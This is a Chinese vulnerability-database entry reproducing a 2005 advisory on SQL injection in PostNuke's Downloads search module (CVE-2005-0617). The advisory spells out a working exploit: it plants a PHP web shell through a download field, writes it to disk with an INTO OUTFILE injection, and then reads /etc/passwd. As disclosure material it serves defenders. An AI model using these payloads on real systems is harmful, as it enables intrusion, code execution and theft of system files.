PostNuke SQL注入漏洞
漏洞ID | 1199726 | 漏洞类型 | SQL注入 |
发布时间 | 2005-05-02 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2005-0617 |
CNNVD-ID | CNNVD-200505-053 |
漏洞平台 | N/A | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
PostNuke0.750和0.760-RC2的dl-search.php中存在SQL注入漏洞,远程攻击者可通过show参数执行任意SQL命令。
|漏洞EXP
[PostNuke SQL Injection 0.760-RC2=>x cXIb8O3.3]
Author: Maksymilian Arciemowicz
Date: 20.2.2005
from cxsecurity.com TEAM
- --- 0.Description ---
PostNuke: The Phoenix Release (0.750) and (0.760-RC2)
PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
- --- 1. Sql Injection ---
This sql injection exist in modules/Downloads/dl-search.php on line 74 on function search()
Vulnerabilities code:
- -51-68---
if ($show!="") {
$downloadsresults = $show;
} else {
$show=$downloadsresults;
}
//$query = stripslashes($query);
$column = &$pntable['downloads_downloads_column'];
$sql = "SELECT $column[lid], $column[cid], $column[sid],
$column[title], $column[url], $column[description],
$column[date], $column[hits], $column[downloadratingsummary],
$column[totalvotes], $column[totalcomments],
$column[filesize], $column[version], $column[homepage]
FROM $pntable[downloads_downloads]
WHERE $column[title] LIKE '%".pnVarPrepForStore($query)."%'
OR $column[description] LIKE '%".pnVarPrepForStore($query)."%'
ORDER BY $pntable[downloads_downloads].$orderby";
$result = $dbconn->SelectLimit($sql, $downloadsresults, (int)$min);
- -51-68---
Error exist in varible $show.
Go to this url to view error:
http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&show=cXIb8O3
Error message :
- ---------------
Fatal error: Call to a member function PO_RecordCount() on a non-object in
/www/PostNuke-0.760-RC2/html/modules/Downloads/dl-search.php on line 74
- ---------------
Because this sql injection is after ORDER BY.. we can not use UNION etc. But check this
exploit.
Exploit
Check dir for PostNuke.
http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&show=cXIb8O3
Error message :
- ---------------
Fatal error: Call to a member function PO_RecordCount() on a non-object in
/www/PostNuke-0.760-RC2/html/modules/Downloads/dl-search.php on line 74
- ---------------
For exemple prefix is /www/PostNuke-0.760-RC2/html/.
Now add new download and insert to "Description" or "Home page" php code. For example add:
- ---
<? system($_GET[cx]); ?>
- ---
And when this download exist in db, go to:
http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=[Program
name]&show=10%20INTO%20OUTFILE%20'/[PATH]/pnTemp/Xanthia_cache/cXIb8O3.php'/*
and now for example..
http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cx=cat /etc/passwd
;]
- --- 2. Sql Error ---
This sql injection exist in modules/Downloads/dl-search.php on line 74 on function search()
Vulnerabilities code:
- -46-68---
if(isset($orderby)) {
$orderby = convertorderbyin($orderby);
} else {
$orderby = $pntable['downloads_downloads_column']['title'] . ' ASC';
}
if ($show!="") {
$downloadsresults = $show;
} else {
$show=$downloadsresults;
}
//$query = stripslashes($query);
$column = &$pntable['downloads_downloads_column'];
$sql = "SELECT $column[lid], $column[cid], $column[sid],
$column[title], $column[url], $column[description],
$column[date], $column[hits], $column[downloadratingsummary],
$column[totalvotes], $column[totalcomments],
$column[filesize], $column[version], $column[homepage]
FROM $pntable[downloads_downloads]
WHERE $column[title] LIKE '%".pnVarPrepForStore($query)."%'
OR $column[description] LIKE '%".pnVarPrepForStore($query)."%'
ORDER BY $pntable[downloads_downloads].$orderby";
$result = $dbconn->SelectLimit($sql, $downloadsresults, (int)$min);
- -46-68---
Error exist in:
- ---
$orderby = convertorderbyin($orderby);
- ---
and sql querty is:
- ---
SELECT pn_downloads_downloads.pn_lid, pn_downloads_downloads.pn_cid,
pn_downloads_downloads.pn_sid, pn_downloads_downloads.pn_title, pn_downloads_downloads.pn_url,
pn_downloads_downloads.pn_description, pn_downloads_downloads.pn_date,
pn_downloads_downloads.pn_hits, pn_downloads_downloads.pn_ratingsummary,
pn_downloads_downloads.pn_totalvotes, pn_downloads_downloads.pn_totalcomments,
pn_downloads_downloads.pn_filesize, pn_downloads_downloads.pn_version,
pn_downloads_downloads.pn_homepage FROM pn_downloads_downloads WHERE
pn_downloads_downloads.pn_title LIKE '%%' OR pn_downloads_downloads.pn_description LIKE '%%'
ORDER BY pn_downloads_downloads.
- ---
Url:
http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&orderby=
- --- 3. How to fix ---
Download the new version of the script or update.
- --- 4.Contact ---
Author: Maksymilian Arciemowicz
|受影响的产品
Postnuke Software Foundation Postnuke 0.760 Rc2
Postnuke Software Foundation Postnuke 0.750
|参考资料
来源:SECTRACK
名称:1013324
链接:http://securitytracker.com/id?1013324
来源:news.postnuke.com
链接:http://news.postnuke.com/Article2669.html
来源:BUGTRAQ
名称:20050228[SECURITYREASON.COM]PostNukeSQLInjection0.760-RC2=>xcXIb8O3.3
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110962710805864&w;=2
相关推荐: Sun JRE Arbitrary Command Execution Vulnerability
Sun JRE Arbitrary Command Execution Vulnerability 漏洞ID 1103446 漏洞类型 Input Validation Error 发布时间 2001-02-21 更新时间 2001-02-21 CVE编号 N…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666